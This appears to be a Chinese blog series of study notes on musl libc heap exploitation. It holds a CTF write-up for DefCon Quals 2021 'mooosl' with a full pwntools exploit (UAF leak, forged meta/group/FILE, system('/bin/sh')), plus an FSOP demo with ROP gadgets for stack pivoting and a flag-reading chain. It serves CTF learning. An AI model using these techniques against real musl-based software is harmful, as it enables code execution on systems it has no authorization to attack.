musl pwn 入门 (4)

发表于 2023-02-28 更新于 2023-03-01 分类于学习笔记， musl pwn 系列
本文字数： 9.8k 阅读时长 ≈ 9 分钟

在前面的介绍中，我们学习了musl pwn的基本原理，下面我们就通过一道经典例题进一步巩固。

这是DefCon Quals 2021中的一道题mooosl，直接在github上搜这道题的名字就可以找到作者发布的附件，内含说明、作者的exp、源码以及二进制程序。

注：我本来以为题目给的musl 1.2.2的libc和自己机子上面的一样，结果发现差得太远了，白花了我大半天时间。😭

1. 逆向分析

这是一个菜单题，包含三种操作store、query和delete，经过逆向分析之后可以知道这个菜单题的数据结构逻辑。程序中有一段0x8000大小的空间hashmap，可以保存0x1000个指针。这个指针是作者定义的结构体，结构体中包含有两个字符串，分别为key和value。进行store操作时，首先输入key，然后程序使用一个函数计算其哈希值（0-0xFFF），这个哈希值就是这个结构体需要保存到hashmap中的索引。如果有两个key的哈希值相同，则第二次store获取的结构体就会成为hashmap中的链首，结构体中还有一个指针用于形成链表，第一次store的结构体的地址就保存在第二次store的结构体之中。query则是根据输入的key值计算出哈希值对应的结构体并输出。delete会将找到的结构体移出hashmap。

本题的漏洞在delete函数中：

注意delete中的if语句，这个if语句内部的功能是从hashmap中移出结构体实例，p_chain就是hashmap中的地址。但这里有一种情况没有考虑：当要删除的结构体位于链尾时，if语句的两个条件都不会满足，这样这个结构体就不会从链表中删除，而是留在其中。这就为我们UAF创造了条件。如果我们能够通过堆排布操作让另一个结构体的value地址等于这个已经被删除的结构体地址，那么通过query我们就能够获取到这个结构体中的内容，其中包含多个指针的地址。

2. 解题第一步——泄露信息

我们再来回顾一下free函数的流程：free的重点在于nontrivial_free，注意下面的代码片段：

// (free函数的一个片段)
	wrlock();
	struct mapinfo mi = nontrivial_free(g, idx);
	unlock();
	if (mi.len) {
		int e = errno;
		munmap(mi.base, mi.len);
		errno = e;
	}

// (nontrivial_free函数的一个片段)
	if (mask+self == (2u<<g->last_idx)-1 && okay_to_free(g)) {
		// any multi-slot group is necessarily on an active list
		// here, but single-slot groups might or might not be.
		if (g->next) {
			assert(sc < 48);
			int activate_new = (ctx.active[sc]==g);
			dequeue(&ctx.active[sc], g);
			if (activate_new && ctx.active[sc])
				activate_group(ctx.active[sc]);
		}
		return free_group(g);
	}

// (free_group中的一个片段)
	if (g->maplen) {
		step_seq();
		record_seq(sc);
		mi.base = g->mem;
		mi.len = g->maplen*4096UL;
	}
	...
	free_meta(g);
	return mi;

当一个group中所有的chunk均被释放时，在释放最后一个chunk时会调用到free_group函数将group释放，这是我们不希望看到的，因此在堆排布的过程中，我们不应该让一个meta中的所有chunk在某一时刻全部被释放。

另外注意到，malloc函数在选择chunk时不会去选择刚刚被free的chunk，因为此时代表该chunk的bit只在freed_mask中为1，在avail_mask中为0。

static inline uint32_t activate_group(struct meta *m)
{
	assert(!m->avail_mask);
	uint32_t mask, act = (2u<<m->mem->active_idx)-1;
	do mask = m->freed_mask;
	while (a_cas(&m->freed_mask, mask, mask&~act)!=mask);
	return m->avail_mask = mask & act;
}

而activate_group函数则可以将free_mask中的所有chunk变为avail_mask。这个函数触发的条件是：这个group的avail_mask为0，该group中不是被free的chunk就是正在使用的chunk。因此，想要分配到已经被free的结构体所在的chunk，就应该首先让这个group中的chunk全部被分配一次。

考虑到本题使用的是calloc而不是malloc，因此堆排布的目标应该是让一个结构体的value指向另一个结构体，而且不能分配到原来结构体所在的chunk。可行的方法是：

Step 1: 分配第1个storage结构体
Step 2: 进行堆空间排布
Step 3: 分配第2个storage结构体使得storage结构体本身位于其value的后面
Step 4: delete第2个storage
Step 5: 分配第3个storage结构体使得这个结构体的chunk就是第2个storage的value
Step 6: 对第2个storage调用query以获得第3个storage结构体中的指针等

这里需要进行计算，让两个不同的key值具有相同的哈希值，这个不难实现，因为最终结果是12比特，穷举即可。

                                                    # 6543210
store(b'A', b'9889')                                # AAAAAAU
for i in range(5):
    query(b'A' * 0x30)                              # AFFFFFU
store(b'B', b'A' * 0x30)                            # UAAAAUU
store(find_collision(b'B'), b'B')                   # UAAAUUU
delete(b'B')                                        # FAAAUFU
for i in range(3):
    query(b'A' * 0x30)                              # FFFFUFU -> AAAAUAU
store(b'C', b'C' * 0x1000)                          # AAAUUUU
query(b'B')

如上面的代码片段所示，即可通过query操作打印出最后一个store创建的结构体的信息。最后一个store的value地址就在当前的group中，根据这个值可以获取该group的地址。注意这里的最后一次store分配了一个大空间，这会让musl在libc地址正下方mmap一块空间，这样我们可以通过这个地址获取到libc的基地址。在此之后，我们只需要重复地通过query操作修改第二次store获得的storage中的value地址，即可实现任意地址读。因为此时我们可以根据获取的两个地址推导出第二个storage中的关键字段的值。在第一次leak之后，7个chunk索引从高到低的状态应该依次为：AAAAUUU（A可用，U正用，F释放），其中第7个是第二个storage结构体保存的位置，那么我们可以先用3个无效的query让状态变为AFFFUUU，然后就可以使用query操作来修改第二个storage结构体的值，最后再一次query进行任意写。

由此，我们可以获取到meta_area的secret值，libc的基地址等关键信息，之后就要开始使用unlink进行利用了。

leak = hex2bytes(io.recvline().split(b":")[1])
group_addr = u64(leak[0:8]) - 0x70
smallchunk = group_addr + 0x30
mmap_addr = u64(leak[8:16]) - 0x20
enc = u64(leak[32:40]) - 1
libc_base = mmap_addr + 0x4000

for i in range(3):
    query(b'B' * 0x30)
query(p64(smallchunk) + p64(group_addr) + p64(1) + p64(0x30) + p64(enc) + p64(0), key_size=0x30)
query(b'B')

leak = hex2bytes(io.recvline().split(b":")[1])
meta_addr = u64(leak[0:8])
meta_area = meta_addr & 0xFFFF_FFFF_FFFF_F000
info('meta_area: ' + hex(meta_area))
for i in range(3):
    query(b'B' * 0x30)
query(p64(smallchunk) + p64(meta_area) + p64(1) + p64(0x30) + p64(enc) + p64(0), key_size=0x30)
query(b'B')

leak = hex2bytes(io.recvline().split(b":")[1])
secret = u64(leak[0:8])
info('secret: ' + hex(secret))
system = libc_base + libc.symbols['system']
binsh = libc_base + next(libc.search(b'/bin/sh'))
stderr = libc_base + libc.symbols['stderr']
stdout = libc_base + libc.symbols['stdout']

3. 解题第二步：伪造`FILE`、`meta`、`group`等结构并利用

这一步是常规步骤，我们将伪造的FILE结构体、伪造的meta、group、chunk放在一个chunk中，注意meta_area需要页对齐，并在页首部写入secret值。

写入之后，我们想办法释放假的chunk，方法是将原来用于leak的chunk分配出去，然后修改内部指针的值，再通过delete删除即可。然后就可以利用unlink修改stderr指针的值为我们的假chunk。但是很不幸的是，stderr指针所在的段是只读的，我不知道为什么很多的文章都说要修改这个地方，但是这里不能改，如果能改的话是肯定可以过的。也就是最后一次delete无法完成。

exp:

from pwn import *
context.log_level = 'debug'
io = process('./mooosl', env={'LD_PRELOAD': 'libc.so'})
libc = ELF('libc.so')
elf = ELF('./mooosl')

sla = lambda x, y: io.sendlineafter(x, y)
sa = lambda x, y: io.sendafter(x, y)
att = lambda: gdb.attach(io)
sleep = lambda: time.sleep(3)

def encrypt(content: bytes):
    res = 2021
    for i in range(len(content)):
        res = res * 0x13377331 + ord(content.decode()[i])
        res %= 0x1_0000_0000
    return res & 0xFFF

def encrypt_original(content: bytes):
    res = 2021
    for i in range(len(content)):
        res = res * 0x13377331 + ord(content.decode()[i])
        res %= 0x1_0000_0000
    return res

def store(key_content, value_content, key_size = None, value_size = None):
    sla(b'option: ', b'1')
    if key_size is None:
        sla(b'key size: ', str(len(key_content)).encode())
        sa(b'key content: ', key_content)
    else:
        sla(b'key size: ', str(key_size).encode())
        sa(b'key content: ', key_content)
    if value_size is None:
        sla(b'value size: ', str(len(value_content)).encode())
        sa(b'value content: ', value_content)
    else:
        sla(b'value size: ', str(value_size).encode())
        sa(b'value content: ', value_content)

def query(key_content, key_size = None):
    sla(b'option: ', b'2')
    if key_size is None:
        sla(b'key size: ', str(len(key_content)).encode())
        sa(b'key content: ', key_content)
    else:
        sla(b'key size: ', str(key_size).encode())
        sa(b'key content: ', key_content)

def delete(key_content):
    sla(b'option: ', b'3')
    sla(b'key size: ', str(len(key_content)).encode())
    sa(b'key content: ', key_content)

def find_collision(victim: bytes):
    i = 0
    target = encrypt(victim)
    while True:
        if encrypt(str(i).encode()) == target and str(i).encode() != victim:
            return str(i).encode()
        i += 1

def hex2bytes(content: bytes):
    res = b''
    for i in range(len(content) // 2):
        res += p8(int(content.decode()[i*2], 16) * 0x10 + int(content.decode()[i*2+1], 16))
    return res

                                                    # 6543210
store(b'A', b'9889')                                # AAAAAAU
for i in range(5):
    query(b'A' * 0x30)                              # AFFFFFU
store(b'B', b'A' * 0x30)                            # UAAAAUU
store(find_collision(b'B'), b'B')                   # UAAAUUU
delete(b'B')                                        # FAAAUFU
for i in range(3):
    query(b'A' * 0x30)                              # FFFFUFU -> AAAAUAU
store(b'C', b'C' * 0x1000)                          # AAAUUUU
query(b'B')

leak = hex2bytes(io.recvline().split(b":")[1])
group_addr = u64(leak[0:8]) - 0x70
smallchunk = group_addr + 0x30
mmap_addr = u64(leak[8:16]) - 0x20
enc = u64(leak[32:40]) - 1
libc_base = mmap_addr + 0x4000

for i in range(3):
    query(b'B' * 0x30)
query(p64(smallchunk) + p64(group_addr) + p64(1) + p64(0x30) + p64(enc) + p64(0), key_size=0x30)
query(b'B')

leak = hex2bytes(io.recvline().split(b":")[1])
meta_addr = u64(leak[0:8])
meta_area = meta_addr & 0xFFFF_FFFF_FFFF_F000
info('meta_area: ' + hex(meta_area))
for i in range(3):
    query(b'B' * 0x30)
query(p64(smallchunk) + p64(meta_area) + p64(1) + p64(0x30) + p64(enc) + p64(0), key_size=0x30)
query(b'B')

leak = hex2bytes(io.recvline().split(b":")[1])
secret = u64(leak[0:8])
info('secret: ' + hex(secret))
system = libc_base + libc.symbols['system']
binsh = libc_base + next(libc.search(b'/bin/sh'))
stderr = libc_base + libc.symbols['stderr']
stdout = libc_base + libc.symbols['stdout']

for i in range(2):
    query(b'B' * 0x30)
fake_file_addr = libc_base - 0x3000 + 0x560
fake_meta_addr = libc_base - 0x2000 + 0x10
fake_group_addr = libc_base - 0x2000 + 0x40

# key
key = p64(group_addr + 0x20)
key += p64(fake_group_addr + 0x10)
key += p64(4)
key += p64(0x30)
key += p64(encrypt_original(find_collision(find_collision(b'B'))))
key += p64(0)

fake_file = b'/bin/sh\x00'
fake_file += p64(0) * 6
fake_file += p64(1)     # wbase
fake_file += p64(0)
fake_file += p64(system)    # write

maplen = 1
sizeclass = 8
last_idx = 0
freeable = 1
fake_meta = p64(fake_group_addr + 0x10 + 0x80)      # prev
fake_meta += p64(stderr)                            # next
fake_meta += p64(fake_group_addr)                   # fake_meta->mem
fake_meta += p64(0)                                 # fake_meta->avail_mask
fake_meta += p64(last_idx + (freeable << 5) + (sizeclass << 6) + (maplen << 12))
fake_meta += p64(0)

fake_group = p64(fake_meta_addr)
fake_group += p64(1)
fake_group += p64(0)

value = fake_file.ljust(0x1000 - 0x560, b'\x00')
value += p64(secret).ljust(0x10, b'\x00')
value += fake_meta
value += fake_group
value += b'\x00' * 0x530

store(key, value, key_size=0x30, value_size=len(value))
# query(p64(group_addr + 0x20) + p64(fake_group_addr + 0x90) + p64(4) + p64(0x30) +
#       p64(encrypt_original(find_collision(find_collision(b'B')))) + p64(0), key_size=0x30)
info('fake chunk address: ' + hex(fake_group_addr + 0x90))
info('stderr: ' + hex(stderr))
info('group address: ' + hex(group_addr))
info('mmap space: ' + hex(mmap_addr))
delete(find_collision(find_collision(b'B')))

io.interactive()

musl pwn 入门 (3)

发表于 2023-02-28 更新于 2023-03-01 分类于学习笔记， musl pwn 系列
本文字数： 15k 阅读时长 ≈ 13 分钟

在上一篇文章中，我们详细分析了如何通过musl的内存分配系统实现任意两个地址互相写的利用。本文据此讨论应该如何使用这种方式getshell。

首先看到musl中的_IO_FILE结构体：

struct _IO_FILE {
	unsigned flags;
	unsigned char *rpos, *rend;
	int (*close)(FILE *);
	unsigned char *wend, *wpos;
	unsigned char *mustbezero_1;
	unsigned char *wbase;
	size_t (*read)(FILE *, unsigned char *, size_t);
	size_t (*write)(FILE *, const unsigned char *, size_t);
	off_t (*seek)(FILE *, off_t, int);
	unsigned char *buf;
	size_t buf_size;
	FILE *prev, *next;
	int fd;
	int pipe_pid;
	long lockcount;
	int mode;
	volatile int lock;
	int lbf;
	void *cookie;
	off_t off;
	char *getln_buf;
	void *mustbezero_2;
	unsigned char *shend;
	off_t shlim, shcnt;
	FILE *prev_locked, *next_locked;
	struct __locale_struct *locale;
};

其中有4个函数指针close、read、write、seek。在解题时，标准输入输出的三个FILE结构体：stdin、stdout、stderr是我们利用的重点。首先我们需要了解musl的exit函数调用链：

_Noreturn void exit(int code)
{
	__funcs_on_exit();
	__libc_exit_fini();
	__stdio_exit();
	_Exit(code);
}

void __stdio_exit(void)
{
	FILE *f;
	for (f=*__ofl_lock(); f; f=f->next) close_file(f);
	close_file(__stdin_used);
	close_file(__stdout_used);
	close_file(__stderr_used);
}

static void close_file(FILE *f)
{
	if (!f) return;
	FFINALLOCK(f);
	if (f->wpos != f->wbase) f->write(f, 0, 0);
	if (f->rpos != f->rend) f->seek(f, f->rpos-f->rend, SEEK_CUR);
}

exit
__stdio_exit
close_file

可以看到close_file中可能会调用三个FILE的write和seek函数指针。我们要修改的也正是这两个指针。在没有沙箱的情况下，只需要将FILE结构体开头的几个字节修改为/bin/sh，再修改write指针的值为system，以及修改f->wpos、f->wbase中其中之一就可以调用到system("/bin/sh")。而在有沙箱保护的情况下，还需要通过栈迁移才能进行orw。

由于调用close_file时，rsp周围的栈环境不受我们控制，因此我们不能使用带有pop rsp的gadget。以下是查找带有mov rsp, xxx的gadget：

root@colin-virtual-machine:~/Desktop/my_how2heap/musl# ROPgadget --binary /lib/x86_64-linux-musl/libc.so | grep "mov rsp"
0x0000000000076b32 : add byte ptr [rax], al ; sub rdx, 8 ; mov rsp, rdx ; jmp rax
0x0000000000022c22 : add dword ptr [rax], eax ; mov rsp, qword ptr [rbp - 0xc0] ; jmp 0x22750
0x000000000007571b : add eax, dword ptr [rax] ; mov rsp, qword ptr [rbp - 0x448] ; jmp 0x75096
0x000000000004d278 : je 0x4d183 ; mov rsp, r9 ; jmp 0x4d101
0x00000000000789f3 : jg 0x78a1d ; mov rsp, qword ptr [rdi + 0x30] ; jmp qword ptr [rdi + 0x38]
0x0000000000022c0a : jne 0x22bf0 ; mov rsp, qword ptr [rbp - 0xc0] ; jmp 0x227e2
0x000000000004d259 : lea ebx, [rax + 1] ; mov rsp, r9 ; jmp 0x4d101
0x000000000004d258 : lea r11, [rax + 1] ; mov rsp, r9 ; jmp 0x4d101
0x000000000004d247 : mov eax, 0xffffffff ; mov rsp, r9 ; jmp 0x4d199
0x00000000000789f2 : mov edi, dword ptr [rdi + 0x28] ; mov rsp, qword ptr [rdi + 0x30] ; jmp qword ptr [rdi + 0x38]
0x00000000000789f1 : mov r15, qword ptr [rdi + 0x28] ; mov rsp, qword ptr [rdi + 0x30] ; jmp qword ptr [rdi + 0x38]
0x000000000007571d : mov rsp, qword ptr [rbp - 0x448] ; jmp 0x75096
0x0000000000022c24 : mov rsp, qword ptr [rbp - 0xc0] ; jmp 0x22750
0x0000000000022c0c : mov rsp, qword ptr [rbp - 0xc0] ; jmp 0x227e2
0x00000000000789f5 : mov rsp, qword ptr [rdi + 0x30] ; jmp qword ptr [rdi + 0x38]
0x000000000004d25c : mov rsp, r9 ; jmp 0x4d101
0x000000000004d24c : mov rsp, r9 ; jmp 0x4d199
0x0000000000076b38 : mov rsp, rdx ; jmp rax
0x000000000004d246 : sub byte ptr [rax - 1], bh ; mov rsp, r9 ; jmp 0x4d199
0x0000000000076b35 : sub edx, 8 ; mov rsp, rdx ; jmp rax
0x0000000000076b34 : sub rdx, 8 ; mov rsp, rdx ; jmp rax

其中注意到mov rsp, qword ptr [rdi + 0x30] ; jmp qword ptr [rdi + 0x38]，由于write函数的第一个参数是FILE结构体自身，因此这里的[rdi+0x30]是我们可以通过提前修改控制的值，这样就能够控制rsp的值。同样，后面的[rdi+0x38]可以写入ROP链开头的一个gadget的地址，从而开始执行ROP链。这里注意到[rdi+0x38]当rdi等于FILE结构体地址时，0x38的偏移对应的正好就是wbase，这样可以在满足判断条件的同时写入gadget地址，一举两得。

总结：

在无沙箱时，需要修改FILE结构体的3个地方——
- 起始位置写入/bin/sh
- f->wpos、f->wbase中其中之一使得二者不等
- write写入system函数地址。
在有沙箱时，需要修改FILE结构体的3个地方——
- f->wbase写入第一个gadget地址使得f->wpos、f->wbase不等的同时能够执行到gadget
- write写入刚才提到的栈迁移的gadget
- 偏移0x30处写入新的栈地址配合栈迁移gadget完成栈迁移
- 此外还需要在其他地方构造好ROP链用于orw

下面笔者编写的demo程序详细演示了两种利用方式的流程，为方便起见，demo中没有通过unlink进行地址写操作，而是直接写。如果使用unlink进行任意地址写，要注意偏移量，两个地址a和b中如果a能够写到b的位置，那么b会写到a+8的位置，对应于两个指针在结构体中的偏移，这一点在上一篇文章中最后打印结果时有体现，不要忽视。

如果执行不成功，请检查自己机器上的musl libc版本是否是1.2.2，若不是，则根据反汇编结果进行偏移量的调整即可。（选择orw模式时需确保当前文件夹中有flag文件）

头文件musl_util.h：

#ifndef MY_HOW2HEAP_MUSL_UTIL_H
#define MY_HOW2HEAP_MUSL_UTIL_H

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <unistd.h>

struct _IO_FILE {
    unsigned flags;
    unsigned char *rpos, *rend;
    int (*close)(FILE *);
    unsigned char *wend, *wpos;
    unsigned char *mustbezero_1;
    unsigned char *wbase;
    size_t (*read)(FILE *, unsigned char *, size_t);
    size_t (*write)(FILE *, const unsigned char *, size_t);
    off_t (*seek)(FILE *, off_t, int);
    unsigned char *buf;
    size_t buf_size;
    FILE *prev, *next;
    int fd;
    int pipe_pid;
    long lockcount;
    int mode;
    volatile int lock;
    int lbf;
    void *cookie;
    off_t off;
    char *getln_buf;
    void *mustbezero_2;
    unsigned char *shend;
    off_t shlim, shcnt;
    FILE *prev_locked, *next_locked;
    struct __locale_struct *locale;
};

struct meta {
    struct meta *prev, *next;
    struct group *mem;
    volatile int avail_mask, freed_mask;
    unsigned long long last_idx:5;
    unsigned long long freeable:1;
    unsigned long long sizeclass:6;
    unsigned long long maplen:8*8-12;
};

struct group {
    struct meta *meta;
    unsigned char active_idx:5;
    char pad[0x10 - sizeof(struct meta *) - 1];
    unsigned char storage[];
};

struct meta_area {
    unsigned long long check;
    struct meta_area *next;
    int nslots;
    struct meta slots[];
};

#define BLACK       "30"
#define RED         "31"
#define GREEN       "32"
#define YELLOW      "33"
#define BLUE        "34"
#define PURPLE      "35"
#define GREEN_DARK  "36"
#define WHITE       "37"

#define UNDEFINED   "-"
#define HIGHLIGHT   "1"
#define UNDERLINE   "4"
#define SPARK       "5"

#define STR_END      "\033[0m"

void printf_color(char* color, char* effect, char* string){
    char buffer[0x1000] = {0};
    strcpy(buffer, "\033[");
    if(effect[0] != '-'){
        strcat(buffer, effect);
        strcat(buffer, ";");
    }
    strcat(buffer, color);
    strcat(buffer, "m");
    strcat(buffer, string);
    printf("%s" STR_END, buffer);
}

void print_binary(char* buf, int length){
    printf("---------------------------------------------------------------------------\n");
    printf("Address info starting in %p:\n", buf);
    int index = 0;
    char output_buffer[80];
    memset(output_buffer, '\0', 80);
    memset(output_buffer, ' ', 0x10);
    for(int i=0; i<(length % 16 == 0 ? length / 16 : length / 16 + 1); i++){
        char temp_buffer[0x10];
        memset(temp_buffer, '\0', 0x10);
        sprintf(temp_buffer, "%#5x", index);
        strcpy(output_buffer, temp_buffer);
        output_buffer[5] = ' ';
        output_buffer[6] = '|';
        output_buffer[7] = ' ';
        for(int j=0; j<16; j++){
            if(index+j >= length)
                sprintf(output_buffer+8+3*j, "   ");
            else{
                sprintf(output_buffer+8+3*j, "%02x ", ((int)buf[index+j]) & 0xFF);
                if(!isprint(buf[index+j]))
                    output_buffer[58+j] = '.';
                else
                    output_buffer[58+j] = buf[index+j];
            }
        }
        output_buffer[55] = ' ';
        output_buffer[56] = '|';
        output_buffer[57] = ' ';
        printf("%s\n", output_buffer);
        memset(output_buffer+58, '\0', 16);
        index += 16;
    }
    printf("---------------------------------------------------------------------------\n");
}

#endif //MY_HOW2HEAP_MUSL_UTIL_H

c文件musl_FSOP.c：

#include "musl_util.h"

#define get_shell 1
#define orw 2
// 重要！在这里修改利用模式
#define mode orw

char* flag = "./flag";
char* bin_sh = "/bin/sh";
size_t enough_space[0x100];
size_t fake_stack[0x40];
char flag_content[0x20];

int main(){
    setbuf(stdin, NULL);
    setbuf(stdout, NULL);
    setbuf(stderr, NULL);

    printf_color(GREEN, UNDEFINED, "本程序用于演示musl libc的FSOP利用方式。\n");
    printf_color(GREEN, UNDEFINED, "测试环境：ubuntu 22.04，musl版本：1.2.2。\n");
    printf_color(GREEN, UNDEFINED, "与glibc相似，FSOP也是musl的一种重要的利用方式。\n");
    printf_color(GREEN, UNDEFINED, "下面是musl libc中FILE结构体的定义：\n\n");

    printf_color(YELLOW, HIGHLIGHT, "(/src/internal/stdio_impl.h, line 21)\n");
    printf_color(PURPLE, HIGHLIGHT,
                 "struct _IO_FILE {\n"
                 "\tunsigned flags;\n"
                 "\tunsigned char *rpos, *rend;\n"
                 "\t\033[1;31mint (*close)(FILE *);\n" "\033[1;" PURPLE "m"
                 "\tunsigned char *wend, *wpos;\n"
                 "\tunsigned char *mustbezero_1;\n"
                 "\tunsigned char *wbase;\n"
                 "\t\033[1;31msize_t (*read)(FILE *, unsigned char *, size_t);\n" "\033[1;" PURPLE "m"
                 "\t\033[1;31msize_t (*write)(FILE *, const unsigned char *, size_t);\n" "\033[1;" PURPLE "m"
                 "\t\033[1;31moff_t (*seek)(FILE *, off_t, int);\n" "\033[1;" PURPLE "m"
                 "\tunsigned char *buf;\n"
                 "\tsize_t buf_size;\n"
                 "\tFILE *prev, *next;\n"
                 "\tint fd;\n"
                 "\tint pipe_pid;\n"
                 "\tlong lockcount;\n"
                 "\tint mode;\n"
                 "\tvolatile int lock;\n"
                 "\tint lbf;\n"
                 "\tvoid *cookie;\n"
                 "\toff_t off;\n"
                 "\tchar *getln_buf;\n"
                 "\tvoid *mustbezero_2;\n"
                 "\tunsigned char *shend;\n"
                 "\toff_t shlim, shcnt;\n"
                 "\tFILE *prev_locked, *next_locked;\n"
                 "\tstruct __locale_struct *locale;\n"
                 "};\n\n");

    printf_color(GREEN, UNDEFINED, "用红色标出的4行表示4个函数指针，这是我们利用的关键。\n");
    printf_color(GREEN, UNDEFINED, "又注意到exit函数有调用链：exit->__stdio_exit->close_file。\n\n");

    printf_color(YELLOW, HIGHLIGHT, "(/src/stdio/__stdio_exit.c, line 16)\n");
    printf_color(PURPLE, HIGHLIGHT,
                 "void __stdio_exit(void)\n"
                 "{\n"
                 "\tFILE *f;\n"
                 "\tfor (f=*__ofl_lock(); f; f=f->next) close_file(f);\n"
                 "\tclose_file(__stdin_used);\n"
                 "\tclose_file(__stdout_used);\n"
                 "\tclose_file(__stderr_used);\n"
                 "}\n\n");

    printf_color(YELLOW, HIGHLIGHT, "(/src/stdio/__stdio_exit.c, line 8)\n");
    printf_color(PURPLE, HIGHLIGHT,
                 "static void close_file(FILE *f)\n"
                 "{\n"
                 "\tif (!f) return;\n"
                 "\tFFINALLOCK(f);\n"
                 "\tif (f->wpos != f->wbase) f->write(f, 0, 0);\n"
                 "\tif (f->rpos != f->rend) f->seek(f, f->rpos-f->rend, SEEK_CUR);\n"
                 "}\n\n");

    printf_color(GREEN, UNDEFINED, "可以看到3个标准IO的FILE结构体都可能会调用write和seek函数。\n");
    printf_color(GREEN, UNDEFINED, "如果能够修改这些函数指针的值，就能够执行任意代码。\n");
    printf_color(GREEN, UNDEFINED, "因此无论如何，首先要做的就是获取libc的基地址。\n");
    printf_color(GREEN, UNDEFINED, "我们就利用stderr标准错误FILE结构体的地址来获取。\n");

    size_t stderr_addr = (size_t)stderr;
    printf_color(GREEN, UNDEFINED, "stderr的地址为：");
    printf("\033[1;31m%#zx\n\033[0m", stderr_addr);
    printf_color(GREEN, UNDEFINED, "stderr在libc中的偏移量为0xAD080。\n");
    size_t libc_base = stderr_addr - 0xAD080;
    printf_color(GREEN, UNDEFINED, "计算得到libc的基地址为：");
    printf("\033[1;31m%#zx\n\n\033[0m", libc_base);

    if(mode == get_shell){
        printf_color(BLUE, HIGHLIGHT, "你选择了get shell模式。\n");
        printf_color(GREEN, UNDEFINED, "在get shell模式中，我们需要修改stderr的3处内容：\n");
        printf_color(RED, HIGHLIGHT, "1. 开头，需修改为字符串\"/bin/sh\"。\n");
        printf_color(RED, HIGHLIGHT, "2. wpos或wbase，使得这两个值不等即可。\n");
        printf_color(RED, HIGHLIGHT, "3. write函数指针，修改为system的地址。\n");

        printf_color(GREEN, UNDEFINED, "需要注意调用write函数时，第一个参数是FILE结构体地址。\n");
        printf_color(GREEN, UNDEFINED, "因此需要在FILE开头写字符串，从而get shell。\n");

        size_t system_addr = (size_t)system;
        printf_color(GREEN, UNDEFINED, "system的地址为：");
        printf("\033[1;31m%#zx\n\033[0m", system_addr);
        strcpy((char*)stderr_addr, "/bin/sh");
        ((FILE*)stderr_addr)->wbase = (unsigned char*)1;
        ((FILE*)stderr_addr)->write = (size_t (*)(FILE*, const unsigned char*, size_t))system_addr;

        printf_color(GREEN, UNDEFINED, "调教完成的stderr：\n");
        print_binary((char*)stderr_addr, sizeof(struct _IO_FILE));

        printf_color(GREEN, UNDEFINED, "最后只需要调用exit函数即可。\n");
        exit(0);
    }else if(mode == orw){
        printf_color(BLUE, HIGHLIGHT, "你选择了orw模式。\n");
        printf_color(GREEN, UNDEFINED, "orw的利用方式较get shell要复杂一些。\n");
        printf_color(GREEN, UNDEFINED, "但对于stderr而言还是只需要修改3个地方：\n");
        printf_color(RED, HIGHLIGHT, "1. 偏移0x30处，修改为修改为新栈的地址。\n");
        printf_color(RED, HIGHLIGHT, "2. wbase，偏移0x38，修改为第一个gadget的地址。\n");
        printf_color(RED, HIGHLIGHT, "3. write函数指针，修改为栈迁移的gadget的地址。\n\n");

        printf_color(GREEN, UNDEFINED, "在偏移0x789F5处有这样一个gadget：\n");
        printf_color(RED, HIGHLIGHT, "0x00000000000789f5 : mov rsp, qword ptr [rdi + 0x30] ; jmp qword ptr [rdi + 0x38]\n");
        printf_color(GREEN, UNDEFINED, "考虑到write函数调用的第一个参数为stderr地址，rdi=stderr地址。\n");
        printf_color(GREEN, UNDEFINED, "按照上面的方案修改stderr，可以完美实现栈迁移。\n");

        printf_color(GREEN, UNDEFINED, "准备伪造栈的地址为：");
        printf("\033[1;31m%p\n\033[0m", fake_stack);

        size_t pivot_gadget = libc_base + 0x789F5;
        size_t pop_rdi = libc_base + 0x152A1;
        size_t pop_rsi = libc_base + 0x1B0A1;
        size_t pop_rdx = libc_base + 0x2A50B;

        ((FILE*)stderr_addr)->mustbezero_1 = (unsigned char*)fake_stack;
        ((FILE*)stderr_addr)->wbase = (unsigned char*)pop_rdi;
        ((FILE*)stderr_addr)->write = (size_t (*)(FILE*, const unsigned char*, size_t))pivot_gadget;

        printf_color(GREEN, UNDEFINED, "调教完成的stderr：\n");
        print_binary((char*)stderr_addr, sizeof(struct _IO_FILE));

        printf_color(GREEN, UNDEFINED, "一些有用的gadget：\n");
        printf_color(BLUE, HIGHLIGHT, "pop rdi ; ret : ");
        printf("\033[1;" BLUE "m%#zx\n\033[0m", pop_rdi);
        printf_color(BLUE, HIGHLIGHT, "pop rsi ; ret : ");
        printf("\033[1;" BLUE "m%#zx\n\033[0m", pop_rsi);
        printf_color(BLUE, HIGHLIGHT, "pop rdx ; ret : ");
        printf("\033[1;" BLUE "m%#zx\n\033[0m", pop_rdx);

        fake_stack[0] = (size_t)flag;   // open函数参数1
        fake_stack[1] = pop_rsi;
        fake_stack[2] = 0;              // open函数参数2
        fake_stack[3] = (size_t)open;   // 调用open
        fake_stack[4] = pop_rdi;
        fake_stack[5] = 3;              // read函数参数1
        fake_stack[6] = pop_rsi;
        fake_stack[7] = (size_t) flag_content;  // read函数参数2
        fake_stack[8] = (size_t) pop_rdx;
        fake_stack[9] = 0x20;           // read函数参数3
        fake_stack[10] = (size_t)read;  // 调用open
        fake_stack[11] = pop_rdi;
        fake_stack[12] = 1;             // write函数参数1
        fake_stack[13] = pop_rsi;
        fake_stack[14] = (size_t) flag_content;  // write函数参数2
        fake_stack[15] = (size_t) pop_rdx;
        fake_stack[16] = 0x20;          // write函数参数3
        fake_stack[17] = (size_t)write; // 调用write

        printf_color(GREEN, UNDEFINED, "新栈内容：\n");
        print_binary((char*)fake_stack, 20 * 8);

        printf_color(GREEN, UNDEFINED, "最后只需要调用exit函数即可。\n");
        exit(0);
    }
}

当然，在musl libc中FSOP的方法有很多，这里只是演示了其中一种。更多的利用方式还是需要通过多看多做来掌握。

musl pwn 入门 (2)

发表于 2023-02-28 更新于 2023-03-01 分类于学习笔记， musl pwn 系列
本文字数： 17k 阅读时长 ≈ 16 分钟

在上一篇文章中我们学习了musl libc中内存分配的相关知识，了解了重要的数据结构及函数内容。本文将在此基础上进一步分析musl pwn的利用方式。

musl libc利用的核心思想是向free中传入一个假的chunk指针。由于free函数会通过该chunk进行回溯，获取到其所在的group和meta，因此除了构造假chunk外，还需要构造假group和假meta。如果在假meta中合理构造prev和next指针，在nontrivial_free中调用dequeue函数就可以实现这两个地址互相写。

但在整个流程中，我们需要绕过很多检查，以及进入正确的分支。

在free中会调用nontrivial_free，free中调用的get_meta函数中有一些检查项：

(/src/malloc/mallocng/meta.h, line 129)
static inline struct meta *get_meta(const unsigned char *p)
{
	assert(!((uintptr_t)p & 15));
	int offset = *(const uint16_t *)(p - 2);
